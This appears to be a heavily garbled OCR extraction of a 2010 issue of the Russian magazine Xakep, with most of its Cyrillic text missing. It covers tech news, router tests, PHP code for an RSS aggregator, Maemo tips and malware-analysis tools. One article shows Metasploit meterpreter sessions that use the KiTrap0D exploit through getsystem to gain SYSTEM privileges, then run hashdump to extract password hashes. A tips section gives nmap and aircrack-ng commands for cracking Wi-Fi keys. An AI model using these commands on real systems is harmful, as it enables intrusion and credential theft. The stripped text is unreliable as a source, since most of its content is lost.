
.

54

x 03 () 2010

.
210
:

TDL3:

03 (134) 2010

USERLEVEL!
IE: 0-DAY

NT AUTHORITY \SYSTEM

WINDOWS

7
KDE

KDE 4

. 32

. 94

. 48

134

. 28



ASTERISK
. 119

INTRO

, . - IE
. , ,
(- ) Google. ,
.
, , ,
IE. -
IE. 144 .
!

nikitozz, . .
nikitoz@real.xakep.ru
z

Content
MegaNews
Ferrum
802.11n
PC_ZONE
, GOOGLE READER!
MAEMO 5 TIPS'N'TRICKS
USERLEVEL!
KDE
EASY-HACK
TDL3
GOV
VEH WINDOWS X64
Internet Explorer
SQL
X-TOOLS
2.
SQL
][-
][-
, BitTorrent
-
Windows
-
.NET
C++
SYN/ACK
IN DA FOCUS
,
Asterisk
Windows
7 KDE 4
NT AUTHORITY\SYSTEM Windows
Gujin,
netboot.me boot.kernel.org
PSYCHO:
FAQ UNITED
WWW2
FAQ
8.5
web-
/

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

(lyashchenko@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)
>






>

>
(strekneva@gameland.ru)
>

> -

>


(andrey@gameland.ru)
>


(devald@gameland.ru)
>


(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.

:
content@gameland.ru

.
, , 2009

MEGANEWS

MIFRILL MIFRILL@REAL.XAKEP.RU

MEGANEWS

,
SUN!

,
Oracle Sun Microsystems, .
, ,
, ,
. ,
Sun

Java, hardware-,
, ,
VirtualBox, Solaris , MySQL - .
, 9 , , ,
, ,
$7.4
! ,
Oracle ,
. .
Oracle


Kenai (www.kenai.com).
Sun 2008 ,
Java, , , . , ,
Java, Oracle,
. http://
sun.com , , ,
oracle.com.
Sun Microsystems,
IT.


LG
LG DVD- GH24 Super Multi.
24
,

Silent Play. Silent Play
,
.
GH24 2.400
, 32
;
, 30
.
, GH24
,
.
Jamless Play,


,
.


.
SecurDisc,

, LG iODD
,


-.
GH24 Super Multi
1100 .

WD
,
VelociRaptor Western
Digital. , , ; SATA
6 /, 10.000 /, 64 .
, 300 ;
, 600
. , HDD $300.

393 -
2009

BREIN.

X 03 /134/ 10

PC27

GOOGLE


90%
-
IPV4.

Google ,
, ,
, ,
. , ,
, , , IE6,
Google
(Yahoo, Symantec, Adobe ..). Google
(googleblog.blogspot.com) .

,
.
?
, , 4 , ,
Google.cn, , Baidu.com ? :) ,

.
, Microsoft
,

. ,
. Microsoft, ,
, ,
,
IE , , ,
, , .
IE . ,

Opera Software Mozilla. ,
Google

. , Opera ,
40% 4 .

QWERTY
Twitter
.
, , ,
Twitter,
370 ,

Twitter . blacklist naked,
stupid, twitter, secret, porsche,
ferrari russia.


123456 password
,
- -

. , gfhjkm (
) - .


,
. Twitter
, ,
malware-.


,
,
.

LENOVO
, - ? Lenovo IdeaPad U1 Hybrid,
- . ,
. - Qualcomm
Snapdragon, - 16 , 512 ,
11.6" (1366 768 ) .
- Intel Core 2 Duo U4100 1.3 , 4
DDR3 128 .
Skylight Linux, - Windows 7. Bluetooth,
3G WiFi ,
- 1.3 .
8 .
, $999.

J3

PC27

, ;
13% ( AKAMAI).



aka Script, , carderplanet.
cc,

,
-
, .
Script

( -
),
,


.
,

: , ,

kraina.org.
ua,
.


,
,

.
, - , .

:
15.000 ,

, ,
.
kraina.org.ua
PR ,
400-500 ,
.

LINUX FOUNDATION, 5
LINUX- 80%.


Nexus One Google,
,
, , .
HTC,
T-Mobile G1 Nexus One . ,
: 3.7" (AMOLED, 480 x
800), , , ; Qualcomm Snapdragon
3G QSD8250 1 ; 512 , 512 ; SD 4 ( 32
); , 1400
. Android 2.1, GSM/
EDGE (850, 900, 1800, 1900 ), Wi-Fi (802.11b/g/n), Bluetooth
2.1 , 5 . ,
AGPS- .
Nexus One
$529.99. , ,
, , :).
, ?
Android, Cyanogen,
Nexus One
(http://forum.xda-developers.com/showthread.php?t=621441),
, .
(iptables,
USB, WLAN), SSH (
Dropbear) Nano, htop, powertop busybox.


2

PANDALABS.


,
. , , Google,
Bing, Yahoo, MSN, . ,
, ,
, , ,
. , ,
,
, ,
. , 10-20 . .
- , , .
,
.

$1337 GOOGLE,

CHROME .

MYSQL!
Sun Oracle , , , MySQL.
, ,
, Sun 2008 ,
MySQL . - , 2009
Sun, , , 2009,
Sun Oracle. , Oracle
, MySQL, ,
. helpmysql.org, 30
. MySQL, .
, , ,
, , ,
. , MySQL
. . Oracle
Wall Street Journal,
SPAR Solaris , Sun, MySQL
.


- Microsoft
, ,
.
2007 , $240
. Facebook,

, , ,
. -
, ,
Facebook
2008. , ,



Facebook, Twitter (twitter.com/BillGates). ,
, Hello World.
380
. .
, 10 . ,
Microsoft
17 ?



, , ,
, -, -,
SMS ,
,
. , ICQ . Piggy.zip H1N1
-,
.
\? : , ,
:), ? !. , . H1N1 , ,
ICQ , .
Piggy.exe, 1,95 ( !).
Delphi,
PEiD. , ,
,
.
OllyDbg 004A60AC. ,
:). , ,
5 (4 + -).
4-
,
. ,
. ,

. , : 000110001101010000110001
: 0001 1 0001 1 0101 0 0001 1 0001
4-
(0001b => 1, 0001b => 1, 0101b => 5), ,
(115d = 73h = s).
, . icq.com/people/__, HTTP- http://uasc.org.ua/Piggy.
php?=< > .
decoder.php , ,
, eLwaux (uasc.org.ua). , ,
. 2005
IM.Myspace04.AIM,
, (lol no its not its a virus,
). 2007 , .

aka segvec aka


soupnazi aka j4guar17,

, . , 2008 ,
19 ,
, .
,

15 25
,

. , ,

170 .

,
130 .
,

,
, LSD, ,
,


. ,
,
,

. ,
,

:).


22

. ,
Twitter IP-,
, . ,
, ,
. -
, , . , ,
, ,
, .



ErgoMotion Smartfish
Technologies , . . .

, ,
,
. 7 ,
.
,
,
. USB.
, $150,
$50.

8199,5
INTEL CELERON 347 (3,06 ) TIN.


, , ,

,
.
Intel Netgear, CES 2010
Intel Wireless Display,
720p Wi-Fi. Intel WiDi ,
( Sony, Dell
Toshiba, Intel Core i3, i5
i7),
, .
,
802.11n,
,
. ,
HDCP (
), Full-HD,
,
,
WiDi.
.

AMAZON: 25 2009

.

NETCRAFT , 1
2009 233.848.493 .

PS3

GeoHot,
jailbreak ,
Playstation 3,
.
PS3, , ,
.
, 3 , 2
11 ,
, . , PS3, , Xbox360,
,

. Xbox, PS3
Linux, ,
, ,
Linux . ?
,
/
ring0, .
Sony,
.
,
ROM Mark.


,
.

. ,
. ,

-,
PS2. PS3 Linux
.

, IPAD
,

Apple , iPad, , .
, Apple :
LED- 9.7" 1024 768 , , Multi-Touch; Apple A4
1 ; 16 64 -.

iPhone OS 3.2, , ,
iPhone iPod touch,
.
Apple, ,
WiFi Bluetooth,
3G-. iPad,
, 10
.
,
GPS, ,
,

.
- iBookstore,
. , iPad
: , , - ,
Skype ;
Flash, -,
, ; USB-;
, , , . () 242.8 189.7 13.4,
680 733 , .
iPad Wi-Fi
$500 $700, , iPad
Wi-Fi+3G $600 $800.

:
44-
.

?
Google,
Microsoft , ,
,
.
Google Energy

, , ,
Google ,
.
, , , , ,

,

. , ,
,
Google ,
,
,
Google
.


MICROSOFT
, -,
Microsoft - ,
. Microsoft
,
Office 2003 2007,


. -
-? -
, ,
i4i.

Word, Microsoft
Word 2003
Custom XML, i4i .
2007 ,
Microsoft
$290 .,

Office, . Microsoft, , ,
,

Office
2010, .
Word 2007 Office 2007 Custom XML
.

FERRUM

:

TRENDnet
TEW-652BRP

D-Link
DIR-85

NETGEAR
WNR-2000

D-Link
DIR-655

NETGEAR
WNR-3700

NETGEAR
WNR-3700

D-Link
DIR-655

ASUS
RT-N16

AMD Athlon
II X4 620

ASUS
RT-N16

802.11N

!,
WI-FI. ,
. ,
IEEE 802.11N, ( )
600 /!
2.4 5 . ,
. ,
.
:

.
1) ,
LAN, WAN. ,
( NAT). ( ),
. IP-.
2) PPTP- WAN-. , .
, ,
.
3) . ,
Wi-Fi. 1 6 ( ). Wi-Fi , . WPA2-PSK
AES.


ASUS RT-N16
D-LINK DIR-655
D-LINK DIR-855
NETGEAR WNR-2000
NETGEAR WNDR-3700
TRENDNET TEW-652BRP

PPTP, /C
Asus RT-N16

24.12
31.04
34.54
99.3

D-Link DIR-655

67.98

129.73
152.69

D-Link DIR-855

118.38
72.45

NETGEAR WNR-2000

78.8

TRENDnet TEW-652BRP
FDX

81.51
110.42

NETGEAR WNDR-3700
lanwan

113.2

161.68
176.02

51.72
50.34
55.01

wan-lan

D-LINK
PPTP-

Link
-855

4700 .

ASUS
RT-N16

5200 .

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT/NAPT, DYNDNS, STATIC ROUTING, DHCP,
EZQOS
: SPI, PACKET FILTER, URL FILTER, MAC FILTER
: PPPOE, PPTP, L2TP,
IP-
: EZSETUP, WPS, - UPNP, WAN
BRIDGING, AIDISK, 2 USB 2.0

ASUS RT-N16 . ,
USB-
, .
(
HTTP, FTP BitTorrent) . Broadcom BCM4718,
533 , 128 DDR2.
, ; WPS ( ) EzQoS ( ).
WAN
IPTV CPU-. .

, NAT 145
/. PPTP .

D-LINK
DIR-655
:

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2.4~2.5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DYNDNS, DHCP, STATIC ROUTING,
IGMP MULTICAST , QOS
: SPI, URL FILTER, MAC FILTER, IP FILTER,
ACCESS CONTROL
: PPPOE, PPTP, L2TP,
IP-
: WPS, USB-

,
3G,
. ,
, IGMP Multicast, QoS,
,

WPS. ,
,
.
PPTP, PPPoE L2TP. , , .

,
USB-,
.


WI-FI, 1 , /C
Asus RT-N16

40.89
50.26
32.76

D-Link DIR-655

59.64

72.33
68.32
91.37
100.8

D-Link DIR-855

85.92
46.18

NETGEAR WNR-2000

29.15

NETGEAR WNDR-3700
both

77.23

27.6

TRENDnet TEW-652BRP
Upstream

65.78

48.02

36.61

63.08
63.48

downstream

D-LINK DIR-855
, , 5

8200 .

D-LINK
DIR-855

NETGEAR
WNR-2000

2200 .

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5, 5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, QOS
: SPI, URL FILTER, MAC FILTER, IP FILTER, DMZ
: PPPOE, PPTP, L2TP,
IP-
: WPS, USB-, -

: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100


/
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, UPNP,
QOS
: SPI, URL FILTER, MAC FILTER, KEYWORD
BLOCKING
: PPPOE, PPTP, IP-, BIGPOND
: WPS,

-
,
. 5
, , ,
5 2.4 . . ,
LAN-WAN , , , Ethernet. USB,
, HDD , ,
D-Link DIR-655, .


WAN,
, . ,
.
, , ,
.
,
. ,
NETGEAR WNR-2000
.

,
, .


, -, ,
L2TP .


WI-FI, 6 , /C
Asus RT-N16

23.72
32.76
31.53

D-Link DIR-655

33.84

65.26

43.9

D-Link DIR-855

72.19
38

NETGEAR WNR-2000

23.32
29.66

NETGEAR WNDR-3700

17.2

TRENDnet TEW-652BRP
Upstream

both

34.54

91.92
94.33

51.42
57.72
51.08
55.4

downstream

NETGEAR
WNR-3700

5200 .

TRENDNET
TEW-652BRP

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5, 5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, UPNP, QOS
: SPI, URL FILTER, MAC FILTER, KEYWORD
BLOCKING
: PPPOE, PPTP, IP-, BIGPOND
: WPS,

NETGEAR WNR-2000 ( Wi-Fi),


. , USB
, DLNA, (2.4
5 ). ,
SMB, Wi-Fi,
,
. , , NAT
PPTP- !

NETGEAR : L2TP, web-.

,
, . -


2000 .

: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100


/
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP
: SPI, URL FILTER, MAC FILTER, IP FILTER
: PPPOE, PPTP, L2TP,
IP-, BIGPOND
: WPS

,
, Russia PPTP Russia PPPoE. ,
. ,
. ,
, , .
:
VPN , IP-, IP, MAC
URL, Wi-Fi
Protected Setup.

, .
, .

, - ,
- ,
. ,
D-Link DIR-655,

,
.
TRENDnet TEW-652BRP,
.z


PC_ZONE
alex.raiden@gmail.com

,
GOOGLE READER!


, - .
, , ,
. . ,
!

Google Reader.
,
-
,
PHP MySQL.
RSS-

. ,
,
Key-Value-,

, ,
.
PHP!

,
.

RSS- , XML.
: RSS
(,


Mozilla Thunderbird), ,
- .
-,
, Google Reader.
:
, reader.
google.com .
, . , ,
.
(
, Google Reader ).
Twitter-, .
,
,
, . , ,
- ,
, , Google
,
, . ,
: -

, .

PHP-,
. ,
,
Amazon EC2 ?

. ,

, .

LAMP-,

Zend Framework jQuery, MySQL
.
Gearman. ,


:). .

YOUR CLIENT APPLICATION CODE

GEARMAN
STACK

GEARMAN CLIENT API


(C, PHP, Perl, MySQL UDF, ...)

YOUR

GEARMAN JOB SERVER

PROVIDED

APPLICATION

gearmand

BY GEARMAN

GEARMAN WORKER API


(C, PHP, Perl, ...)
YOUR WORKER APPLICATION CODE

- GEARMAN


, .
, ,
, ,
URL , , , RSS ,
. URL
. !
?
,
.
, http:// ,
.
, ,
.
.
Zend Framework, , Zend_Uri, . ,
;
, - ?
, ,
( validURI.php),
, .
,

(,
),
Zend_Uri::factory .
- , .
: ,
http://
URL . ,
, ,
URL, , URL
.
,
. ,
-,
. ,
. Zend' Zend_Feed_Reader,
(
XSLT
CNBC).
,
RSS- , -

! Zend_Feed_Reader

, . ,
.
.
, ,

?
HTTP .
,
( HTTP-),
.
Zend
!
,

Zend_Feed_Reader:
// Frontend options come first (24-hour lifetime), then the File backend options
$cache = Zend_Cache::factory('Core', 'File',
    array('lifetime' => 24 * 3600,
          'automatic_serialization' => true,
          'cache_id_prefix' => 'xakep_'),
    array('read_control_type' => 'adler32',
          'cache_dir' => '/tmp/xakep/cache'));




?
- PHP 5.2.11 , 5.3.1.
- -, Apache 2.2 Nginx.
- , MySQL , 5.1.
- Gearmand .
- Memcachedb, Gearmand
.
- Redis ,
Redis 1.2,
GitHub-.
- Zend Framework (
trunk- SVN-).
,
jQuery jQuery UI .
phpMyAdmin.

// Cache fetched feeds
Zend_Feed_Reader::setCache($cache);
// Use HTTP conditional GET so unchanged feeds are not downloaded again
Zend_Feed_Reader::useHttpConditionalGet(true);


,
,

Memcached.
- .
MySql feeds user_
subscriptions .
?
;
, . feeds
, .
db.sql
.


, .
.
(, cron-) ,
, . ,
. -


, (
);

( ,

). : ,
?
.

.
MySQL
, , .
, , ,
, .
,

.
, SQL- - key/value (#128 z, PDF-
). ,
NoSQL- Redis.
,

, ,
.
Redis-
Rediska. , , Zend
Framework -,
, . :

$redis_conf = array(
    'namespace' => 'xakep_',
    'servers' => array(array(
        'host' => 'localhost',
        'port' => 6379,
        'weight' => 1)),
    'keyDistributor' => 'crc32');
try
{
    $redis = new Rediska($redis_conf);
}
catch (Rediska_Exception $e)
{
    die("[ERROR] Error creating Redis instance: " . $e->getMessage());
}

Redis- .
.
SET,
,
. ,
, ,
MD5 , .
,

.
!
processFeed (
processFeed.php) ,
, ,
. , ,



GEARMAND

:
$_item['hash'] = md5($_item['title'] . '|' . $_item['link'] . '|' . $_item['time']);

,
:
$_fhash = md5($feed_url); // key of this feed's set in Redis
if ((!$redis->exists($_fhash)) ||
    (($redis->exists($_fhash)) && (!$redis->existsInSet($_fhash, $_item['hash']))))
{
    // New item: remember its hash in the feed's set
    $redis->addToSet(md5($feed_url), $_item['hash']);
}
else
    continue;

,
, .

>getDateCreated()->getTimestamp();
$_item['link'] = $feed->getLink();

,
. ID , ,
,

md5-. , -

$feed = Zend_Feed_Reader::import($feed_url);
if ($feed instanceof Zend_Feed_Reader_FeedAbstract)
{ /* the feed was parsed; process it here */ }

, .
. ,
, ,
. , ,
,
, , , !
foreach
.

md5-
, . ,
Redis-. , ,
, .
.


,
, :
$_item['title'] = htmlspecialchars($feed->getTitle(), ENT_QUOTES);
$_item['time'] = $feed->getDateCreated()->getTimestamp();

, , , ,
, , . Zend :
$db->beginTransaction() $db->commit(). , , Rollback: $db->rollBack().
, (
), , ,
.
- ,
!

,
GEARMAN'

, ,
. ,
. , .
, -
, , .
.
, , Java,
Python. ,

.

, . ,
(, ),
,
. , ,
.
: Cron 5 ( , ) , , , Gearman'
. 10 , ,
, , . ,
,
.
, ,
, ,
, . , , .
,
,
. ,

,
,
JAVA,
PYTHON. ,
, .
, . , PHP! :)
Gearman. ,
, .
, , , ,
.
, ,
Gearman ,
. ! ,
Gearman , ,
, cron .
, API ,
MySQL UDF ( ).
C-,
,
PEAR- Net_Gearman, ,
. ,
, PECL.
apt-get install gearman-job-server, gearmand -d. 4730,
.
, ,
, . , . Gearman-, JSON-


, , ! ,
, , ,
, ,
. - , .

. , .
( feedWorker.php)
GearmanWorker, . (
) addServer(). , ,
,
addFunction. , , , Gearman
.
, ,
.
$worker = new GearmanWorker();
$worker->addServer();
$worker->addFunction("feedProcesor", "myFeedProcessor");
function myFeedProcessor($job)

GEARMAN
Gearman,
.
:
- (, job) ,
.
,
. , , ,
. , ,
. , JSON.
- ( ,
Job API), .
, , ,
-.
- (Task) , .
, ,
.
- ,
.
- , . ,

.
,
. ,
,
. ,
, Gearman MySQL
memcachedb ,
. , ,
.

$gmclient = new GearmanClient();
$gmclient->addServer();
$feed_links = $db->fetchAll('SELECT fid, feed_url FROM feeds WHERE errors < 3');
foreach ($feed_links as $fl)
{
    echo "Add to processing queue: " . $fl['feed_url'] . "\n";
    $gmclient->addTaskBackground('feedProcesor', Zend_Json::encode(array($fl)));
}
$gmclient->runTasks();

, . , , Gearman API,

.
, 3- .
, , - ,
.
, JSON-. ,
,
runTasks().
. ,
.
, do(), ,
.
, ,
,
, .
Cron-,
, , . , ,
10 , .
: ,
, , .
,
, .
,
.

while ($worker->work());

, ?

{
$feeds = Zend_Json::decode($job->workload());

,
, .
JSON-,
Zend_Json, .

!
processFeed.php
processFeed()
$feeds.
Gearmand,
, $job->sendComplete('OK').
true: ,
. , , . :

, ,
, , ,
,
.
, , Gearman.
,
. , Digg.com Yahoo!
Gearman.
Zend Framework , , RSS-
! , ,
, ,
,
. ,
, Google Reader,
. z

INFO

info
Gearman PHP
Extension:
pecl.php.net/package/
gearman.

Gearman:
pear.php.net/package/
Net_Gearman.
Python:
launchpad.net/
gearman-interface;
samuel.github.com/
python-gearman.
Java
:
launchpad.net/
gearman-java.
RSS (Really Simple
Syndication)


XML-


.
RSS,

, ,
Atom
RDF. Atom

http://tools.ietf.org/
html/rfc4287)
Google.

DVD
dvd

,


.


PC_ZONE
CODING
STEP

STEP@GLC.RU

ALEKSANDR-EHKKERT@RAMBLER.RU

MAEMO 5
TIPS'N'TRICKS

LINUX-, MAEMO
. ,
,
. , ,
,
.
1:

, N900, . ,

- , ,
.
,

.
,

AppWatch. Qt,

,
, ,
. ,


.deb- ( Bluetooth-,
).
. Nokia N900
,
,
deb- .documents
. ,
, :: dpkg -i /home/user/MyDocs/.documents/[ ].deb


MyMenu
Catorise,
, .

2:

,

X-Toolz. , nmap
aircrack
Maemo, Maemo5
.
, ,
!
Nmap N900

!
, Maemo GUI-,

: , nmap -v -O -PN 192.168.1.1. ,
Wi-Fi,
,

, ,
MAC-. ,
Wi-Fi WEP/WAP-,
aircrack'.
, WPA
/, -

,
.
,
WPA Handshake.

(
CUDA),
PS3
. ,
aircrack-ng
, , ,
ESSID
: aircrack-ng -c 11
-e victim -Z 4 -W 1 -F cap wlan0.
cap-,
. ,
, , N900
50 :).
extras-devel,
.

3:

,
N900 Quake 3, .
Maemo5

: Doom 2, Warcraft 2, Starcraft, Quake,
RedAlert, Duke Nukem 3D. ,

BLUEMAEMO N900


Linux': , Quake 3 OpenArena, Warcraft 2 WarGus,
Doom PrBoom ..
Simple DirectMedia Layer (SDL),
,
Maemo,
. , SDL
,
,
.
,
, , Linux', ,
SDL.
,
.
.

DOSBox,
N900.
DOS,
, MS-DOS.
,
Fallout ( DOSBox'
: migenonline.com/
N900/dosbox-0.73-Fallout1.conf.txt), ,

.

4:


N900 , AJAX, Gmail.
,
MicroB Mozilla Gecko,
Firefox
. Fennec, 6-
-, - :
. ,

NMAP N900

, , ,
. Fennec
2,
. . ,
,
about:config, browser.cache.disk.enable .

, .
,
, ,
Ctrl-Shift+O,
. N900

,
.

5:

, ,
. ,
N900
BlueMaemo.
? Maemo
, Blueooth.
, Bluetooth
HID Bluetooth,
.
BlueMaemo Wait
a connection ( ).
, , Bluetooth-,


.
Bluetooth- : .

-

. :
N900
, . ,
,
( ),
-.
,
BlueMaemo PlayStation 3,

Bluetooth-. Linux-, HID-
hcitool
scan, ,
hidd connect _bt___
hid, .

6: N900

N900, ,
,
. ,
Linux',
,
,
, ,
. ,

, RDA (Remote
Device Access) apu.
ndhub.net.
/,
www.forum.nokia.com.

( Firefox, IE, Opera Safari
Google Chrome ),
JRE. ,
( , Nokia X6)
.jnlp-, Java.
, !

Maemo (www.xakep.ru/N900). z


PC_ZONE
Step twitter.com/stepah

! ,
, ,
, . ,
,

?
? ,
,
? :).


.


-

, . ,
- ,
.

.

VIRUSTOTAL
WWW.VIRUSTOTAL.COM


- ,
VirusTotal. :

40 ,


.
,
,
,
:).
, - VirusTotal
Uploader.
,
. ,

, .
,
, ,
,
. ,

SANDBOXIE
WWW.SANDBOXIE.COM

, : , ,
, ,
. ,
,
. , , ,
,
(sandbox).
, ,
,
,


CWSANDBOX'


,
. Vista
: sandbox
,
UAC.
, ,

, Sandboxie.

,
, sandbox'.
, ,
sandbox, - ? .
,
.
Sysinternals (technet.microsoft.
com/ru-ru/sysinternals) , ,
Process Monitor,
,
, , DLL.
Autoruns
,
- .
API, .
API Monitor
(www.apimonitor.com)
SysAnalyzer (labs.idefense.com). , ,
,
.
, , , :

,
,
.

,
. ,

, , ,
host ,

, Threat Expert
. ,

,

. ,
: GUI-,
. ?
,
.
:
CWSAndbox , , VirusTotal
(,
). -
,

.

ANUBIS
ANUBIS.ISECLAB.ORG

,
CWSAndbox.
,
,
. ,
,
,
!


CWSAndbox
, . ,
CWSAndbox :
- , , . . , ,
, ,

.
...

, , , Threat Expert ,
,
. , , ,
, ?
-
.
,
, Anubis.
pcap-
,

Wireshark',
,
Network Miner (networkminer.sourceforge.net),
.
, Anubis
.
HTTP, .
,
:
,
.

.

THREAT EXPERT
WWW.THREATEXPERT.COM

COMODO INSTANT MALWARE ANALYSIS


CAMAS.COMODO.COM

CWSANDBOX
WWW.CWSANDBOX.ORG

Threat Expert,

- Comodo : -


PDFID
BLOG.DIDIERSTEVENS.COM/
PROGRAMS/PDF-TOOLS

ANUBIS PCAP-

, . ,
CWSandbox Threat Expert
.
, ,
,
, -
.
Comodo ,

. ,
:
,
DNS/
HTTP-, API-, DLL- ..
,
, , .

MANDIANT RED CURTAIN


WWW.MANDIANT.COM

Mandiant
Red Curtain, . PE-
:
, ,
.
, ,
, ,
.
,
,
.. ( -).
, Mandiant Red Curtain, ,
,
.

PEID
PEID.HAS.IT

,
,
/.
, -,
, , -, -



. , , PEiD.

600 PE-,
/,
.
, Python nPEid
(http://www.malforge.com/npeid/npeid.
zip). pcap-
PE-,
. , PEiD
:
.

OSAM
WWW.ONLINE-SOLUTIONS.RU/
PRODUCTS/OSAM-AUTORUNMANAGER.HTML

,
- ,

. Online Solutions Autorun Manager,
.


. OSAM . ,
,
.
API (RegQueryValue, RegOpenKey ..),
.
, OSAM

. ,
Online :
, ,
,
.
.

,

.
,

. PDF-
, Adobe Reader.
Internet Explorer , Adobe Reader
,
.
, ,
JavaScript,
PDF-
. ,
PDF JavaScript, ,
, ,
?
PDF-
, ,
. PDF
,
JavaScript'. ,
/JS /JavaScript ,
JS-. /AA /OpenAction
, ,
.
PDF
JS-

PDF-
JS


HTTP://WWW
links
:
tinyurl.com/reversemalware-sheet.

INFO

info


,
Returnil
Virtual System (www.
returnilvirtualsystem.
com).

,
.
PDFiD,
PDF Tools Python'. ,
JS,
pdf-parser.
JS-
.

Malware URL.


(VirusTotal, Wepawet, Anubis, Threat
Expert), .
: ,
.
,
RSS. , ,
:).

WEPAWET
WEPAWET.ISECLAB.ORG

- PE-. Wepawet
PDF, HTML Flash
.
Wepawet ,
,
.
, Wepawet
,
,
. Wepawet
JS-,
HTML,
. SWF ,
-!

MALWARE URL
WWW.MALWAREURL.COM

, , Wepawet

, !

, .
, .

,
.
- . z


Windows


,
: Program
Files, Windows, Users\
%AllUsersProfile%\
ProgramData, Documents and Settings
HKLM\
Software.

,
.
Norman Sandbox
(www.norman.com/
security_center/
security_tools/submit_
file/en)

DVD
dvd

,
,
DVD.


PC_ZONE

NT AUTHORITY\SYSTEM

Step twitter.com/stepah

NT AUTHORITY\SYSTEM
GETSYSTEM

GETSYSTEM

USERLEVEL!

NT AUTHORITY\SYSTEM
WINDOWS

METASPLOIT
,
. GETSYSTEM, USER LEVEL RING0,
NT AUTHORITY\SYSTEM! .

19
0-day ,
Windows,
NT 3.1,
1993 , . exploit-db.com Tavis Ormandy

KiTrap0d, ,
. .
vdmexploit.dll
vdmallowed.exe, -
-, exe-.
, , ,

, NT AUTHORITY\SYSTEM.
,
.
cmd.exe
. ?
,

.
Internet Explorer
, -


. ,
( ), ? -
KiTrap0d,
NT AUTHORITY\SYSTEM!
, ,
,
, ,
(
). NT !
,
Microsoft, , .


, 25
Metasploit , KiTrap0d
.

, , .
,
Metasploit
update. ,
, run kitrap0d
.

, -
, Metasploit.

,
meterpreter, :).
,
( )
. ,
:
meterpreter > getuid
Server username: WINXPSP3\user

, . ,
,
. ,
getsystem, , ,
:
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

KITRAP0D

, MICROSOFT

FIXIT!


-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service Named Pipe Impersonation (In Memory/Admin)
2 : Service Named Pipe Impersonation (Dropper/Admin)
3 : Service Token Duplication (In Memory/Admin)
4 : Exploit KiTrap0D (In Memory/User)

, KiTrap0D
. ,
,
NT AUTHORITY\SYSTEM (
-t). ,
, ,
. KiTrap0D,
,
.
meterpreter > getsystem
...got system (via technique 4).

, , KiTrap0D ,
.
? UID ( ):
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

! NT AUTHORITY\SYSTEM
. , ,
. ,
Microsoft
.


, . Metasploit
hashdump

pwdump. ,
, LANMAN/
NTLM
. . ,
hashdump
NT AUTHORITY\SYSTEM.

[-] priv_passwd_get_sam_hashes:
Operation failed: 87. ,
LANMAN/NTLM- HKEY_LOCAL_MACHINE\SAM HKEY_LOCAL_MACHINE\SECURITY, .
. ,


hashdump ,
,
. , ?
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad2bbbe2b51404eeaad3b435b514ee:...
Guest:501:aad3b435baaaaeaa3b435d3b435b514aae04ee:...
HelpAssistant:1000:cefa2909bd5b0f4602168042f2f646:...

. , , l0phtcrack
(www.l0phtcrack.com).





, .

MSDOS WOWEXEC ,
,
.. NtVdmControl() NTVDM. Windows
,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW
- .
16- .
GPEDIT.MSC,
/ /
Windows/

16- .


NT AUTHORITY\SYSTEM

16-

HTTP://WWW
links

:
archives.
neohapsis.com/
archives/fulldisclosure/
2010-01/0346.html.

Microsoft: support.
microsoft.com/
kb/979682.

WARNING

info
.




.


,
. rev2self , -
NT AUTHORITY\SYSTEM: ,
,
